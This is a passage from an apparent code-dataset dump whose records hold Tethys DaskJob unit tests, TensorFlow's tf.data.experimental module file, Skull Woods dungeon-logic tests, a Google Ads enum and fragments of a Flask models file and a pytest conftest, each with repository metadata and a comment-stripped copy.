@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_update_status(self, mock_future, mock_save, mock_client):
mock_future.status = 'finished'
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
djob._update_status()
mock_client.close.assert_called()
mock_save.assert_called()
def test_update_status_with_no_future(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
self.assertIsNone(djob._update_status())
@mock.patch('tethys_compute.models.dask.dask_job.log')
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_update_status_exception(self, mock_future, mock_save, mock_log):
mock_future.status = 'foo'
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler
)
djob._update_status()
mock_log.error.assert_called_with('Unknown Dask Status: "foo"')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
def test_process_result_with_failed_lock(self, mock_re_lock, mock_apl):
mock_apl.return_value = False
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
_process_results_function='test_function')
self.assertIsNone(djob._process_results())
mock_re_lock.assert_not_called()
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future',
new_callable=mock.PropertyMock(return_value=None))
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
def test_process_result_no_future(self, mock_apl, _):
mock_apl.return_value = True
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
_process_results_function='test_function')
self.assertIsNone(djob._process_results())
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future',
new_callable=mock.PropertyMock())
def test_process_result_forget(self, _, mock_client):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler, forget=True)
ret = djob._process_results()
mock_client.close.assert_called()
self.assertIsNone(ret)
@mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
def test_process_result_with_result_function(self, mock_re_lock, mock_apl, mock_client, mock_future, mock_tfe):
fake_key = 'sum_faef'
mock_function_extractor = mock.MagicMock()
mock_function = mock.MagicMock(return_value='foo')
mock_function_extractor.valid = True
mock_function_extractor.function = mock_function
mock_tfe.return_value = mock_function_extractor
mock_apl.return_value = True
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler,
_process_results_function='test_function'
)
djob.key = fake_key
djob._process_results()
mock_client.close.assert_called()
mock_client.gather.assert_called_with(mock_future)
mock_function.assert_called_with(mock_client.gather())
mock_client.set_metadata.assert_called_with(fake_key, False)
self.assertEqual('', djob.key)
mock_re_lock.assert_called()
@mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.log')
def test_process_result_with_client_gather_exception(self, mock_logger, mock_re_lock, mock_apl, mock_client,
mock_future, mock_tfe):
mock_function_extractor = mock.MagicMock()
mock_function = mock.MagicMock(return_value='foo')
mock_function_extractor.valid = True
mock_function_extractor.function = mock_function
mock_tfe.return_value = mock_function_extractor
mock_apl.return_value = True
gather_exception = Exception('Fake exception')
mock_client.gather.side_effect = gather_exception
djob = DaskJob(
name='test_dj',
user=self.user,
label='label',
scheduler=self.scheduler,
_process_results_function='test_function'
)
djob._process_results()
mock_client.gather.assert_called_with(mock_future)
mock_logger.warning.assert_called()
mock_function.assert_called_with(gather_exception)
mock_re_lock.assert_called()
@mock.patch('django.db.models.base.Model.save')
@mock.patch('tethys_compute.models.dask.dask_job.log')
@mock.patch('tethys_compute.models.tethys_job.TethysFunctionExtractor')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.client')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._acquire_pr_lock')
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob._release_pr_lock')
def test_process_result_with_result_function_with_exception(self, mock_re_lock, mock_apl, _, mock_client,
mock_tfe, mock_log, mock_save):
mock_function_extractor = mock.MagicMock()
mock_function = mock.MagicMock()
mock_function.side_effect = Exception
mock_function_extractor.valid = True
mock_function_extractor.function = mock_function
mock_tfe.return_value = mock_function_extractor
mock_apl.return_value = True
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler,
_process_results_function='test_function')
djob._process_results()
mock_log.exception.assert_called_with('Process Results Function Error')
self.assertEqual('ERR', djob._status)
mock_save.assert_called()
mock_re_lock.assert_called()
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_stop(self, mock_future):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.stop()
mock_future.cancel.assert_called()
def test_pause(self):
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=self.scheduler)
self.assertRaises(NotImplementedError, djob.pause)
def test_resume(self):
djob = DaskJob(name='test_dj', user=self.user, key='test_key', label='label', scheduler=self.scheduler)
self.assertRaises(NotImplementedError, djob.resume)
def test_result(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.result = 'serialized_results'
ret = djob.result
self.assertEqual('serialized_results', ret)
def test_result_none(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.result = None
ret = djob.result
self.assertIsNone(ret)
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_done(self, mock_future):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
ret = djob.done()
mock_future.done.assert_called()
self.assertEqual(mock_future.done(), ret)
def test_done_with_no_future(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
self.assertIsNone(djob.done())
def test_update_status_interval_prop(self):
from datetime import timedelta
djob = DaskJob(name='test_daskjob', user=self.user, label='label')
djob.save()
ret = DaskJob.objects.get(name='test_daskjob').update_status_interval
self.assertIsInstance(ret, timedelta)
self.assertEqual(timedelta(0, 0), ret)
djob.delete()
@mock.patch('tethys_compute.models.dask.dask_job.DaskJob.future')
def test_retry(self, mock_future):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.retry()
mock_future.retry.assert_called()
def test_retry_no_future(self):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
self.assertIsNone(djob.retry())
@mock.patch('tethys_compute.models.dask.dask_job.log')
def test_fail_acquire_pr_lock(self, mock_log):
djob = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
djob.extended_properties['processing_results'] = True
self.assertFalse(djob._acquire_pr_lock())
mock_log.warning.assert_called_with('Unable to aquire lock. Processing results already occurring. Skipping...')
@mock.patch('django.db.models.base.Model.save')
def test_fail_release_pr_lock(self, mock_save):
    """``_release_pr_lock`` clears the lock flag and persists the job."""
    dask_job = DaskJob(name='test_dj', user=self.user, label='label', scheduler=self.scheduler)
    dask_job.extended_properties['processing_results'] = True
    dask_job._release_pr_lock()
    self.assertFalse(dask_job.extended_properties['processing_results'])
    mock_save.assert_called()
| true | true |
f7103a621ee09bad322a5add73d81308b6b2be8c | 6,345 | py | Python | tensorflow/python/data/experimental/__init__.py | Sonata-Wang/tensorflow | 8bbef0cd77879d05ed69bf30e76087847a8ca4a2 | [
"Apache-2.0"
] | 6 | 2019-02-05T22:36:51.000Z | 2022-01-14T03:50:57.000Z | tensorflow/python/data/experimental/__init__.py | dipu989/tensorflow | 3e21fe5faedab3a8258d344c8ad1cec2612a8aa8 | [
"Apache-2.0"
] | 1 | 2019-09-14T04:40:07.000Z | 2020-11-18T18:16:17.000Z | tensorflow/python/data/experimental/__init__.py | dipu989/tensorflow | 3e21fe5faedab3a8258d344c8ad1cec2612a8aa8 | [
"Apache-2.0"
] | 8 | 2016-01-14T13:12:56.000Z | 2021-04-09T10:20:53.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Experimental API for building input pipelines.
This module contains experimental `Dataset` sources and transformations that can
be used in conjunction with the `tf.data.Dataset` API. Note that the
`tf.data.experimental` API is not subject to the same backwards compatibility
guarantees as `tf.data`, but we will provide deprecation advice in advance of
removing existing functionality.
See [Importing Data](https://tensorflow.org/guide/datasets) for an overview.
@@Counter
@@CheckpointInputPipelineHook
@@CsvDataset
@@DatasetStructure
@@NestedStructure
@@OptimizationOptions
@@Optional
@@OptionalStructure
@@RandomDataset
@@Reducer
@@SparseTensorStructure
@@SqlDataset
@@StatsAggregator
@@StatsOptions
@@Structure
@@TFRecordWriter
@@TensorStructure
@@ThreadingOptions
@@bucket_by_sequence_length
@@bytes_produced_stats
@@cardinality
@@choose_from_datasets
@@copy_to_device
@@dense_to_sparse_batch
@@enumerate_dataset
@@filter_for_shard
@@get_next_as_optional
@@get_single_element
@@group_by_reducer
@@group_by_window
@@ignore_errors
@@latency_stats
@@make_batched_features_dataset
@@make_csv_dataset
@@make_saveable_from_iterator
@@map_and_batch
@@map_and_batch_with_legacy_function
@@parallel_interleave
@@parse_example_dataset
@@prefetch_to_device
@@rejection_resample
@@sample_from_datasets
@@scan
@@shuffle_and_repeat
@@take_while
@@unbatch
@@unique
@@AUTOTUNE
@@INFINITE_CARDINALITY
@@UNKNOWN_CARDINALITY
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.python.data.experimental.ops.batching import dense_to_sparse_batch
from tensorflow.python.data.experimental.ops.batching import map_and_batch
from tensorflow.python.data.experimental.ops.batching import map_and_batch_with_legacy_function
from tensorflow.python.data.experimental.ops.batching import unbatch
from tensorflow.python.data.experimental.ops.cardinality import cardinality
from tensorflow.python.data.experimental.ops.cardinality import INFINITE as INFINITE_CARDINALITY
from tensorflow.python.data.experimental.ops.cardinality import UNKNOWN as UNKNOWN_CARDINALITY
from tensorflow.python.data.experimental.ops.counter import Counter
from tensorflow.python.data.experimental.ops.enumerate_ops import enumerate_dataset
from tensorflow.python.data.experimental.ops.error_ops import ignore_errors
from tensorflow.python.data.experimental.ops.filter_for_shard_ops import filter_for_shard
from tensorflow.python.data.experimental.ops.get_single_element import get_single_element
from tensorflow.python.data.experimental.ops.grouping import bucket_by_sequence_length
from tensorflow.python.data.experimental.ops.grouping import group_by_reducer
from tensorflow.python.data.experimental.ops.grouping import group_by_window
from tensorflow.python.data.experimental.ops.grouping import Reducer
from tensorflow.python.data.experimental.ops.interleave_ops import choose_from_datasets
from tensorflow.python.data.experimental.ops.interleave_ops import parallel_interleave
from tensorflow.python.data.experimental.ops.interleave_ops import sample_from_datasets
from tensorflow.python.data.experimental.ops.iterator_ops import CheckpointInputPipelineHook
from tensorflow.python.data.experimental.ops.iterator_ops import make_saveable_from_iterator
from tensorflow.python.data.experimental.ops.optimization import AUTOTUNE
from tensorflow.python.data.experimental.ops.optimization_options import OptimizationOptions
from tensorflow.python.data.experimental.ops.parsing_ops import parse_example_dataset
from tensorflow.python.data.experimental.ops.prefetching_ops import copy_to_device
from tensorflow.python.data.experimental.ops.prefetching_ops import prefetch_to_device
from tensorflow.python.data.experimental.ops.random_ops import RandomDataset
from tensorflow.python.data.experimental.ops.readers import CsvDataset
from tensorflow.python.data.experimental.ops.readers import make_batched_features_dataset
from tensorflow.python.data.experimental.ops.readers import make_csv_dataset
from tensorflow.python.data.experimental.ops.readers import SqlDataset
from tensorflow.python.data.experimental.ops.resampling import rejection_resample
from tensorflow.python.data.experimental.ops.scan_ops import scan
from tensorflow.python.data.experimental.ops.shuffle_ops import shuffle_and_repeat
from tensorflow.python.data.experimental.ops.stats_aggregator import StatsAggregator
from tensorflow.python.data.experimental.ops.stats_ops import bytes_produced_stats
from tensorflow.python.data.experimental.ops.stats_ops import latency_stats
from tensorflow.python.data.experimental.ops.stats_options import StatsOptions
from tensorflow.python.data.experimental.ops.take_while_ops import take_while
from tensorflow.python.data.experimental.ops.threading_options import ThreadingOptions
from tensorflow.python.data.experimental.ops.unique import unique
from tensorflow.python.data.experimental.ops.writers import TFRecordWriter
from tensorflow.python.data.ops.dataset_ops import DatasetStructure
from tensorflow.python.data.ops.iterator_ops import get_next_as_optional
from tensorflow.python.data.ops.optional_ops import Optional
from tensorflow.python.data.ops.optional_ops import OptionalStructure
from tensorflow.python.data.util.structure import NestedStructure
from tensorflow.python.data.util.structure import SparseTensorStructure
from tensorflow.python.data.util.structure import Structure
from tensorflow.python.data.util.structure import TensorStructure
# pylint: enable=unused-import
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| 45.647482 | 96 | 0.849173 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.experimental.ops.batching import dense_to_sparse_batch
from tensorflow.python.data.experimental.ops.batching import map_and_batch
from tensorflow.python.data.experimental.ops.batching import map_and_batch_with_legacy_function
from tensorflow.python.data.experimental.ops.batching import unbatch
from tensorflow.python.data.experimental.ops.cardinality import cardinality
from tensorflow.python.data.experimental.ops.cardinality import INFINITE as INFINITE_CARDINALITY
from tensorflow.python.data.experimental.ops.cardinality import UNKNOWN as UNKNOWN_CARDINALITY
from tensorflow.python.data.experimental.ops.counter import Counter
from tensorflow.python.data.experimental.ops.enumerate_ops import enumerate_dataset
from tensorflow.python.data.experimental.ops.error_ops import ignore_errors
from tensorflow.python.data.experimental.ops.filter_for_shard_ops import filter_for_shard
from tensorflow.python.data.experimental.ops.get_single_element import get_single_element
from tensorflow.python.data.experimental.ops.grouping import bucket_by_sequence_length
from tensorflow.python.data.experimental.ops.grouping import group_by_reducer
from tensorflow.python.data.experimental.ops.grouping import group_by_window
from tensorflow.python.data.experimental.ops.grouping import Reducer
from tensorflow.python.data.experimental.ops.interleave_ops import choose_from_datasets
from tensorflow.python.data.experimental.ops.interleave_ops import parallel_interleave
from tensorflow.python.data.experimental.ops.interleave_ops import sample_from_datasets
from tensorflow.python.data.experimental.ops.iterator_ops import CheckpointInputPipelineHook
from tensorflow.python.data.experimental.ops.iterator_ops import make_saveable_from_iterator
from tensorflow.python.data.experimental.ops.optimization import AUTOTUNE
from tensorflow.python.data.experimental.ops.optimization_options import OptimizationOptions
from tensorflow.python.data.experimental.ops.parsing_ops import parse_example_dataset
from tensorflow.python.data.experimental.ops.prefetching_ops import copy_to_device
from tensorflow.python.data.experimental.ops.prefetching_ops import prefetch_to_device
from tensorflow.python.data.experimental.ops.random_ops import RandomDataset
from tensorflow.python.data.experimental.ops.readers import CsvDataset
from tensorflow.python.data.experimental.ops.readers import make_batched_features_dataset
from tensorflow.python.data.experimental.ops.readers import make_csv_dataset
from tensorflow.python.data.experimental.ops.readers import SqlDataset
from tensorflow.python.data.experimental.ops.resampling import rejection_resample
from tensorflow.python.data.experimental.ops.scan_ops import scan
from tensorflow.python.data.experimental.ops.shuffle_ops import shuffle_and_repeat
from tensorflow.python.data.experimental.ops.stats_aggregator import StatsAggregator
from tensorflow.python.data.experimental.ops.stats_ops import bytes_produced_stats
from tensorflow.python.data.experimental.ops.stats_ops import latency_stats
from tensorflow.python.data.experimental.ops.stats_options import StatsOptions
from tensorflow.python.data.experimental.ops.take_while_ops import take_while
from tensorflow.python.data.experimental.ops.threading_options import ThreadingOptions
from tensorflow.python.data.experimental.ops.unique import unique
from tensorflow.python.data.experimental.ops.writers import TFRecordWriter
from tensorflow.python.data.ops.dataset_ops import DatasetStructure
from tensorflow.python.data.ops.iterator_ops import get_next_as_optional
from tensorflow.python.data.ops.optional_ops import Optional
from tensorflow.python.data.ops.optional_ops import OptionalStructure
from tensorflow.python.data.util.structure import NestedStructure
from tensorflow.python.data.util.structure import SparseTensorStructure
from tensorflow.python.data.util.structure import Structure
from tensorflow.python.data.util.structure import TensorStructure
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| true | true |
f7103cf22159d3ede9a65e78e17f06013e656af4 | 4,661 | py | Python | test/dungeons/TestSkullWoods.py | RoflCopter69/MultiWorld-Utilities | 545bb8023c7b5be44584bf32bca696c8d7a19213 | [
"MIT"
] | null | null | null | test/dungeons/TestSkullWoods.py | RoflCopter69/MultiWorld-Utilities | 545bb8023c7b5be44584bf32bca696c8d7a19213 | [
"MIT"
] | 5 | 2020-01-18T21:10:46.000Z | 2020-01-25T20:58:19.000Z | test/dungeons/TestSkullWoods.py | RoflCopter69/MultiWorld-Utilities | 545bb8023c7b5be44584bf32bca696c8d7a19213 | [
"MIT"
] | 2 | 2020-01-18T17:36:50.000Z | 2020-01-22T16:52:08.000Z | from test.dungeons.TestDungeon import TestDungeon
class TestSkullWoods(TestDungeon):
    """Access-logic tests for the Skull Woods dungeon.

    Each entry handed to ``run_tests`` appears to be
    ``[location, expected_reachable, items_collected(, items_excluded)]``,
    where the optional fourth element lists items withheld from the pool —
    TODO confirm the exact tuple semantics against ``TestDungeon.run_tests``.
    """

    def testSkullWoodsFrontAllEntrances(self):
        """Front section reachable from all three of its entrances."""
        self.starting_regions = ['Skull Woods First Section', 'Skull Woods First Section (Left)', 'Skull Woods First Section (Top)']
        self.run_tests([
            # Big chest is gated only on the big key.
            ["Skull Woods - Big Chest", False, []],
            ["Skull Woods - Big Chest", False, [], ['Big Key (Skull Woods)']],
            ["Skull Woods - Big Chest", True, ['Big Key (Skull Woods)']],
            # Everything else is freely reachable with all entrances open.
            ["Skull Woods - Compass Chest", True, []],
            ["Skull Woods - Map Chest", True, []],
            ["Skull Woods - Pot Prison", True, []],
            ["Skull Woods - Pinball Room", True, []]
        ])

    def testSkullWoodsFrontOnly(self):
        """Front entrance only: left-side chests require both small keys."""
        self.starting_regions = ['Skull Woods First Section']
        self.run_tests([
            ["Skull Woods - Big Chest", False, []],
            ["Skull Woods - Big Chest", False, [], ['Never in logic']],
            ["Skull Woods - Compass Chest", False, []],
            ["Skull Woods - Compass Chest", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
            ["Skull Woods - Compass Chest", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
            ["Skull Woods - Map Chest", True, []],
            ["Skull Woods - Pot Prison", False, []],
            ["Skull Woods - Pot Prison", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
            ["Skull Woods - Pot Prison", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
            ["Skull Woods - Pinball Room", False, []],
            ["Skull Woods - Pinball Room", False, [], ['Small Key (Skull Woods)']],
            ["Skull Woods - Pinball Room", True, ['Small Key (Skull Woods)']]
        ])

    def testSkullWoodsLeftOnly(self):
        """Left entrance only; the front exit is removed so it cannot be re-entered."""
        self.starting_regions = ['Skull Woods First Section (Left)']
        self.remove_exits = ['Skull Woods First Section Exit']
        self.run_tests([
            ["Skull Woods - Big Chest", False, []],
            ["Skull Woods - Big Chest", False, [], ['Never in logic']],
            ["Skull Woods - Compass Chest", True, []],
            ["Skull Woods - Map Chest", False, []],
            ["Skull Woods - Map Chest", False, [], ['Small Key (Skull Woods)']],
            ["Skull Woods - Map Chest", True, ['Small Key (Skull Woods)']],
            ["Skull Woods - Pot Prison", True, []],
            ["Skull Woods - Pinball Room", True, []]
        ])

    def testSkullWoodsBackOnly(self):
        """Top entrance only; the front exit is removed so it cannot be re-entered."""
        self.starting_regions = ['Skull Woods First Section (Top)']
        self.remove_exits = ['Skull Woods First Section Exit']
        self.run_tests([
            ["Skull Woods - Big Chest", False, []],
            ["Skull Woods - Big Chest", False, [], ['Big Key (Skull Woods)']],
            ["Skull Woods - Big Chest", True, ['Big Key (Skull Woods)']],
            ["Skull Woods - Compass Chest", False, []],
            ["Skull Woods - Compass Chest", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
            ["Skull Woods - Compass Chest", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
            ["Skull Woods - Map Chest", True, []],
            ["Skull Woods - Pot Prison", False, []],
            ["Skull Woods - Pot Prison", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
            ["Skull Woods - Pot Prison", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
            ["Skull Woods - Pinball Room", False, []],
            ["Skull Woods - Pinball Room", False, [], ['Small Key (Skull Woods)']],
            ["Skull Woods - Pinball Room", True, ['Small Key (Skull Woods)']]
        ])

    def testSkullWoodsMiddle(self):
        """Second section: its one chest is always reachable from its own entrance."""
        self.starting_regions = ['Skull Woods Second Section']
        self.remove_exits = ['Skull Woods Second Section Exit (East)', 'Skull Woods Second Section Exit (West)']
        self.run_tests([["Skull Woods - Big Key Chest", True, []]])

    def testSkullWoodsBack(self):
        """Final section: the boss needs Fire Rod, a sword, and all three small keys."""
        self.starting_regions = ['Skull Woods Final Section (Entrance)']
        self.run_tests([
            ["Skull Woods - Bridge Room", True, []],
            ["Skull Woods - Boss", False, []],
            ["Skull Woods - Boss", False, [], ['Fire Rod']],
            ["Skull Woods - Boss", False, [], ['Progressive Sword']],
            ["Skull Woods - Boss", False, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
            ["Skull Woods - Boss", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)', 'Small Key (Skull Woods)', 'Fire Rod', 'Progressive Sword']],
        ])
class TestSkullWoods(TestDungeon):
def testSkullWoodsFrontAllEntrances(self):
self.starting_regions = ['Skull Woods First Section', 'Skull Woods First Section (Left)', 'Skull Woods First Section (Top)']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Big Key (Skull Woods)']],
["Skull Woods - Big Chest", True, ['Big Key (Skull Woods)']],
["Skull Woods - Compass Chest", True, []],
["Skull Woods - Map Chest", True, []],
["Skull Woods - Pot Prison", True, []],
["Skull Woods - Pinball Room", True, []]
])
def testSkullWoodsFrontOnly(self):
self.starting_regions = ['Skull Woods First Section']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Never in logic']],
["Skull Woods - Compass Chest", False, []],
["Skull Woods - Compass Chest", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Compass Chest", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Map Chest", True, []],
["Skull Woods - Pot Prison", False, []],
["Skull Woods - Pot Prison", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Pot Prison", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", False, []],
["Skull Woods - Pinball Room", False, [], ['Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", True, ['Small Key (Skull Woods)']]
])
def testSkullWoodsLeftOnly(self):
self.starting_regions = ['Skull Woods First Section (Left)']
self.remove_exits = ['Skull Woods First Section Exit']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Never in logic']],
["Skull Woods - Compass Chest", True, []],
["Skull Woods - Map Chest", False, []],
["Skull Woods - Map Chest", False, [], ['Small Key (Skull Woods)']],
["Skull Woods - Map Chest", True, ['Small Key (Skull Woods)']],
["Skull Woods - Pot Prison", True, []],
["Skull Woods - Pinball Room", True, []]
])
def testSkullWoodsBackOnly(self):
self.starting_regions = ['Skull Woods First Section (Top)']
self.remove_exits = ['Skull Woods First Section Exit']
self.run_tests([
["Skull Woods - Big Chest", False, []],
["Skull Woods - Big Chest", False, [], ['Big Key (Skull Woods)']],
["Skull Woods - Big Chest", True, ['Big Key (Skull Woods)']],
["Skull Woods - Compass Chest", False, []],
["Skull Woods - Compass Chest", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Compass Chest", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Map Chest", True, []],
["Skull Woods - Pot Prison", False, []],
["Skull Woods - Pot Prison", False, ['Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Pot Prison", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", False, []],
["Skull Woods - Pinball Room", False, [], ['Small Key (Skull Woods)']],
["Skull Woods - Pinball Room", True, ['Small Key (Skull Woods)']]
])
def testSkullWoodsMiddle(self):
self.starting_regions = ['Skull Woods Second Section']
self.remove_exits = ['Skull Woods Second Section Exit (East)', 'Skull Woods Second Section Exit (West)']
self.run_tests([["Skull Woods - Big Key Chest", True, []]])
def testSkullWoodsBack(self):
self.starting_regions = ['Skull Woods Final Section (Entrance)']
self.run_tests([
["Skull Woods - Bridge Room", True, []],
["Skull Woods - Boss", False, []],
["Skull Woods - Boss", False, [], ['Fire Rod']],
["Skull Woods - Boss", False, [], ['Progressive Sword']],
["Skull Woods - Boss", False, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)'], ['Small Key (Skull Woods)']],
["Skull Woods - Boss", True, ['Small Key (Skull Woods)', 'Small Key (Skull Woods)', 'Small Key (Skull Woods)', 'Fire Rod', 'Progressive Sword']],
]) | true | true |
f7103e80a8ede0bdc771ecfc4ac8fc26714105f6 | 42 | py | Python | .history/app/models_20210927050146.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | .history/app/models_20210927050146.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | .history/app/models_20210927050146.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | from . import db
# connect class user to | 14 | 24 | 0.714286 | from . import db
| true | true |
f7103ec2d4ba007ff5ea0a410b0557eaa6f6e7f4 | 1,153 | py | Python | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/enums/types/shared_set_status.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/enums/types/shared_set_status.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/enums/types/shared_set_status.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v8.enums',
marshal='google.ads.googleads.v8',
manifest={
'SharedSetStatusEnum',
},
)
class SharedSetStatusEnum(proto.Message):
    r"""Container for enum describing types of shared set statuses."""

    class SharedSetStatus(proto.Enum):
        r"""Enum listing the possible shared set statuses."""
        UNSPECIFIED = 0  # No value has been specified.
        UNKNOWN = 1      # Value unknown in this version of the API.
        ENABLED = 2      # The shared set is enabled.
        REMOVED = 3      # The shared set is removed.
| 28.825 | 74 | 0.700781 |
import proto
__protobuf__ = proto.module(
package='google.ads.googleads.v8.enums',
marshal='google.ads.googleads.v8',
manifest={
'SharedSetStatusEnum',
},
)
class SharedSetStatusEnum(proto.Message):
class SharedSetStatus(proto.Enum):
UNSPECIFIED = 0
UNKNOWN = 1
ENABLED = 2
REMOVED = 3
__all__ = tuple(sorted(__protobuf__.manifest))
| true | true |
f7103fc1085344a33c3da77ee0da97ece10a9e77 | 1,420 | py | Python | tests/conftest.py | xaviml/z2m_ikea_controller | e612af5a913e8b4784dcaa23ea5319115427d083 | [
"MIT"
] | 19 | 2019-11-21T19:51:40.000Z | 2020-01-14T09:24:33.000Z | tests/conftest.py | xaviml/z2m_ikea_controller | e612af5a913e8b4784dcaa23ea5319115427d083 | [
"MIT"
] | 11 | 2019-11-20T16:43:35.000Z | 2020-01-17T16:23:06.000Z | tests/conftest.py | xaviml/z2m_ikea_controller | e612af5a913e8b4784dcaa23ea5319115427d083 | [
"MIT"
] | 5 | 2019-12-20T21:31:07.000Z | 2020-01-06T18:49:52.000Z | import asyncio
from asyncio import Task
from typing import Any, Callable
import appdaemon.plugins.hass.hassapi as hass
import appdaemon.plugins.mqtt.mqttapi as mqtt
import pytest
from cx_core import Controller
